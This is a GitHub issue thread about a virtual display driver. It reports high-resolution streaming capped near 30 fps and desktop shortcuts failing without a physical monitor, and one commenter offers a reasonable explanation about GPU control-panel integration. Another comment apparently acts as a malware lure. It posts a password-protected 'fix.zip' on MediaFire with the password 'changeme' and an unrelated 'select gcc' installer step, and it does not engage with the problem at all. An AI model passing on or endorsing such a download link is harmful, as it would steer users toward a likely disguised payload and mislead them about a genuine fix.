### ISSUE TITLE
Problem with shortcuts and FPS

### ISSUE THREAD

**Issue by mcddonal** [itsmikethetech/Virtual-Display-Driver#142]
The situation is as follows: when I disconnect the physical display and connect the virtual one, I choose a resolution of 1920 × 1080 and a frame rate of 60 frames per second. In this case, everything works correctly, according to the statistics provided by Moonlight, and visually everything looks good.

However, when I select a resolution of 3200×1440 (the same as my smartphone), regardless of the frame rate selected, the image is displayed with a delay of 30 frames per second. This is noticeable even to the naked eye.

In addition, when you double-click on the desktop, shortcuts do not open either in the resolution of 1920 × 1080 or in the resolution of 3200 × 1440. If you hover the cursor over the line with the name of the open folder, the download icon appears, but the click still works as usual. Also, a window does not appear asking for permission or refusal to open an application that requires administrator rights. Instead, a black screen just appears. This information may be useful.

Interestingly, if you turn on the physical monitor and repeat all the same steps, everything works smoothly, quickly and without delays, and shortcuts open.
Have you ever encountered a similar problem? Maybe you know how to solve it?

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bud3699** [comment]
Not really, but it could potentially be that with a real monitor software such as nvidia control panel can manage these monitors and apply performance specific enhancements to them. While emulating a display with iddcx, doesnt integrate with these type of applications as there is no physical cable coming from the GPU itself
